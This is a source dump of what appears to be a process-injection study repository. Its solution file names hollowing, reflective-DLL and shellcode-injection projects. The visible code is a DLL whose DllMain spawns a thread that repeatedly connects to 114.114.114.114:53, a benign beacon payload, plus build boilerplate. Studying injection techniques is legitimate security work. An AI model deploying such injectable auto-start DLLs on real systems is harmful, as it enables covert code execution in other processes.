/InjectionDLL/Debug/InjectionDLL.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\injectiondll.pch
2 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\vc140.pdb
3 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\vc140.idb
4 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\stdafx.obj
5 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\dllmain.obj
6 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\injectiondll.obj
7 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.lib
8 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.exp
9 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.ilk
10 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.dll
11 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.pdb
12 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\dllmain.obj
13 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.obj
14 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\stdafx.obj
15 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.pch
16 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\vc140.idb
17 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\vc140.pdb
18 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\cl.command.1.tlog
19 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\cl.read.1.tlog
20 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\cl.write.1.tlog
21 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\injectiondll.write.1u.tlog
22 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\link.command.1.tlog
23 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\link.read.1.tlog
24 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\link.write.1.tlog
25 |
--------------------------------------------------------------------------------
/InjectionDLL/Debug/InjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.cpp:
--------------------------------------------------------------------------------
1 | // InjectionDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "InjectionDLL.h"
6 | #include
7 | #pragma comment(lib,"Ws2_32.lib")
8 | #define MAX_MSG_LEN 1500
9 | void TryConnect();
10 | void __stdcall Connect()
11 | {
12 | while (1)
13 | {
14 | TryConnect();
15 | Sleep(5000);
16 | }
17 |
18 |
19 | }
20 |
21 | void TryConnect()
22 | {
23 | WSADATA wsa;
24 | if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
25 | {
26 | return;
27 | }
28 | SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0);
29 | SOCKADDR_IN SocketSendIn;
30 | SocketSendIn.sin_family = AF_INET;
31 | SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
32 | SocketSendIn.sin_port = htons(53);
33 | connect(m_socket, (SOCKADDR*)&SocketSendIn, sizeof(SOCKADDR));
34 | closesocket(m_socket);
35 | WSACleanup();
36 | }
37 |
38 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.def:
--------------------------------------------------------------------------------
1 | LIBRARY InjectionDLL
2 | EXPORTS
3 | Connect @ 1
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.h:
--------------------------------------------------------------------------------
1 | #ifndef InjectionDll_H_
2 | #define InjectionDll_H_
3 | #if (defined WIN32 || defined _WIN32 || defined WINCE) && defined InjectionDLL_EXPORTS
4 | #define InjectionDLL __declspec(dllexport)
5 | #else
6 | #define InjectionDLL
7 | #endif // InjectionDLL
8 | InjectionDLL void __stdcall Connect();
9 | #endif // !InjectionDll_H_
10 |
11 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/InjectionDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : InjectionDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this InjectionDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your InjectionDLL application.
9 |
10 |
11 | InjectionDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | InjectionDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | InjectionDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named InjectionDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/InjectionDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 | #include "InjectionDLL.h"
4 | #include
5 | #include
6 | void WINAPI inj()
7 | {
8 | Connect();
9 | return;
10 | }
11 | BOOL APIENTRY DllMain( HMODULE hModule,
12 | DWORD ul_reason_for_call,
13 | LPVOID lpReserved
14 | )
15 | {
16 | HANDLE hThread = NULL;
17 | DWORD dwThreadId;
18 | //Ping();
19 | switch (ul_reason_for_call)
20 | {
21 | case DLL_PROCESS_ATTACH:
22 | std::cout << "DLL_PROCESS_ATTACH" << std::endl;
23 | hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)inj, NULL, 0, &dwThreadId);
24 | //WaitForSingleObject(hThread, INFINITE);
25 | break;
26 | case DLL_THREAD_ATTACH:
27 | //Ping();
28 | std::cout << "DLL_THREAD_ATTACH" << std::endl;
29 |
30 | break;
31 | case DLL_THREAD_DETACH:
32 | std::cout << "DLL_THREAD_DETACH" << std::endl;
33 | break;
34 | case DLL_PROCESS_DETACH:
35 | std::cout << "DLL_PROCESS_DETACH" << std::endl;
36 | if (hThread != NULL)
37 | {
38 | CloseHandle(hThread);
39 | }
40 | break;
41 | }
42 | // Ping();
43 | return TRUE;
44 | }
45 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/InjectionDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // InjectionDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/InjectionDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 | #include "targetver.h"
8 | #include
9 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
10 | // Windows Header Files:
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/InjectionDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/InjectionDLL/x64/Debug/InjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/InjectionDLL/x64/Release/InjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 SudoZhange
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/MEMORY MODULE/.vs/MEMORY MODULE/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/.vs/MEMORY MODULE/v14/.suo
--------------------------------------------------------------------------------
/MEMORY MODULE/Debug/MEMORY MODULE.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/MEMORY MODULE/Debug/MEMORY MODULE.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/Debug/MEMORY MODULE.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/MEMORY MODULE/Loader.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/Loader.c
--------------------------------------------------------------------------------
/MEMORY MODULE/Loader.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/Loader.h
--------------------------------------------------------------------------------
/MEMORY MODULE/MEMORY MODULE.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {9724121A-8D51-4686-BD83-45567A5E4229}
23 | Win32Proj
24 | MEMORYMODULE
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/MEMORY MODULE/MEMORY MODULE.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/MEMORY MODULE/MoudleMain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/MoudleMain.cpp
--------------------------------------------------------------------------------
/MEMORY MODULE/x64/Debug/MEMORY MODULE.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/Debug/MemroyInjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.cpp:
--------------------------------------------------------------------------------
1 | // MemroyInjectionDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "MemroyInjectionDLL.h"
6 |
7 |
8 | // This is an example of an exported variable
9 | MEMROYINJECTIONDLL_API int nMemroyInjectionDLL=0;
10 |
11 | // This is an example of an exported function.
12 | MEMROYINJECTIONDLL_API int fnMemroyInjectionDLL(void)
13 | {
14 | return 42;
15 | }
16 |
17 | // This is the constructor of a class that has been exported.
18 | // see MemroyInjectionDLL.h for the class definition
19 | CMemroyInjectionDLL::CMemroyInjectionDLL()
20 | {
21 | return;
22 | }
23 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the MEMROYINJECTIONDLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // MEMROYINJECTIONDLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
7 | #ifdef MEMROYINJECTIONDLL_EXPORTS
8 | #define MEMROYINJECTIONDLL_API __declspec(dllexport)
9 | #else
10 | #define MEMROYINJECTIONDLL_API __declspec(dllimport)
11 | #endif
12 |
13 | // This class is exported from the MemroyInjectionDLL.dll
14 | class MEMROYINJECTIONDLL_API CMemroyInjectionDLL {
15 | public:
16 | CMemroyInjectionDLL(void);
17 | // TODO: add your methods here.
18 | };
19 |
20 | extern MEMROYINJECTIONDLL_API int nMemroyInjectionDLL;
21 |
22 | MEMROYINJECTIONDLL_API int fnMemroyInjectionDLL(void);
23 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}
23 | Win32Proj
24 | MemroyInjectionDLL
25 | 8.1
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | Use
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Windows
94 | true
95 |
96 |
97 |
98 |
99 | Use
100 | Level3
101 | Disabled
102 | _DEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
103 | true
104 |
105 |
106 | Windows
107 | true
108 |
109 |
110 |
111 |
112 | Level3
113 | Use
114 | MaxSpeed
115 | true
116 | true
117 | WIN32;NDEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Windows
122 | true
123 | true
124 | true
125 |
126 |
127 |
128 |
129 | Level3
130 | Use
131 | MaxSpeed
132 | true
133 | true
134 | NDEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
135 | true
136 |
137 |
138 | Windows
139 | true
140 | true
141 | true
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 | false
155 |
156 |
157 | false
158 |
159 |
160 | false
161 |
162 |
163 | false
164 |
165 |
166 |
167 |
168 |
169 | Create
170 | Create
171 | Create
172 | Create
173 |
174 |
175 |
176 |
177 |
178 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : MemroyInjectionDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this MemroyInjectionDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your MemroyInjectionDLL application.
9 |
10 |
11 | MemroyInjectionDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | MemroyInjectionDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | MemroyInjectionDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named MemroyInjectionDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 | #include
4 | #include
5 | #include
6 | #pragma comment(lib,"Ws2_32.lib")
7 | #define MAX_MSG_LEN 1500
8 | void TryConnect()
9 | {
10 | WSADATA wsa;
11 | if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
12 | {
13 | return;
14 | }
15 | SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0);
16 | SOCKADDR_IN SocketSendIn;
17 | SocketSendIn.sin_family = AF_INET;
18 | SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
19 | SocketSendIn.sin_port = htons(53);
20 | connect(m_socket, (SOCKADDR*)&SocketSendIn, sizeof(SOCKADDR));
21 | closesocket(m_socket);
22 | WSACleanup();
23 | }
24 | void __stdcall Connect()
25 | {
26 | while (1)
27 | {
28 | TryConnect();
29 | Sleep(5000);
30 | }
31 |
32 |
33 | }
34 | void WINAPI inj()
35 | {
36 | Connect();
37 | return;
38 | }
39 | BOOL APIENTRY DllMain( HMODULE hModule,
40 | DWORD ul_reason_for_call,
41 | LPVOID lpReserved
42 | )
43 | {
44 |
45 | HANDLE hThread = NULL;
46 | DWORD dwThreadId;
47 | switch (ul_reason_for_call)
48 | {
49 | case DLL_PROCESS_ATTACH:
50 | std::cout << "DLL_PROCESS_ATTACH" << std::endl;
51 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)inj, NULL, 0, &dwThreadId);
52 | std::cout << dwThreadId << std::endl;
53 | break;
54 | case DLL_THREAD_ATTACH:
55 | std::cout << "DLL_THREAD_ATTACH" << std::endl;
56 | break;
57 | case DLL_THREAD_DETACH:
58 | case DLL_PROCESS_DETACH:
59 | break;
60 | }
61 | return TRUE;
62 | }
63 |
64 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // MemroyInjectionDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 |
14 |
15 |
16 | // TODO: reference additional headers your program requires here
17 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/x64/Debug/MemroyInjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ProcessInjection.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ProcessInjection.VC.db
--------------------------------------------------------------------------------
/ProcessInjection.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Gargoyle", "Gargoyle\Gargoyle.vcxproj", "{F313E731-84FF-42BB-8EF6-1FC64489C27E}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HollowingDropper", "HollowingDropper\HollowingDropper.vcxproj", "{6DF3715B-102F-4B2F-8A47-F954478A017B}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectionDLL", "InjectionDLL\InjectionDLL.vcxproj", "{0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}"
11 | EndProject
12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EXEPayload", "EXEPayload\EXEPayload.vcxproj", "{974E1B91-0F7A-4139-9DE0-4617A02EA4F3}"
13 | EndProject
14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLPEForm", "ReflectiveDLLPEForm\ReflectiveDLLPEForm.vcxproj", "{3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}"
15 | EndProject
16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLInjection", "ReflectiveDLLInjection\ReflectiveDLLInjection.vcxproj", "{CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}"
17 | EndProject
18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MEMORY MODULE", "MEMORY MODULE\MEMORY MODULE.vcxproj", "{9724121A-8D51-4686-BD83-45567A5E4229}"
19 | EndProject
20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MemroyInjectionDLL", "MemroyInjectionDLL\MemroyInjectionDLL.vcxproj", "{90E2E935-7557-4AFB-AD9E-B14EC84A243A}"
21 | EndProject
22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLTest", "DLLTest\DLLTest.vcxproj", "{25F8D1B0-3C56-42EC-84AB-B4A01932DF51}"
23 | EndProject
24 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellcodeInjection", "ShellcodeInjection\ShellcodeInjection.vcxproj", "{45525617-1157-4230-8B6C-C559702469DF}"
25 | EndProject
26 | Global
27 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
28 | Debug|x64 = Debug|x64
29 | Debug|x86 = Debug|x86
30 | Release|x64 = Release|x64
31 | Release|x86 = Release|x86
32 | EndGlobalSection
33 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
34 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x64.ActiveCfg = Debug|x64
35 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x64.Build.0 = Debug|x64
36 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x86.ActiveCfg = Debug|Win32
37 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x86.Build.0 = Debug|Win32
38 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x64.ActiveCfg = Release|x64
39 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x64.Build.0 = Release|x64
40 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x86.ActiveCfg = Release|Win32
41 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x86.Build.0 = Release|Win32
42 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x64.ActiveCfg = Debug|x64
43 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x64.Build.0 = Debug|x64
44 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x86.ActiveCfg = Debug|Win32
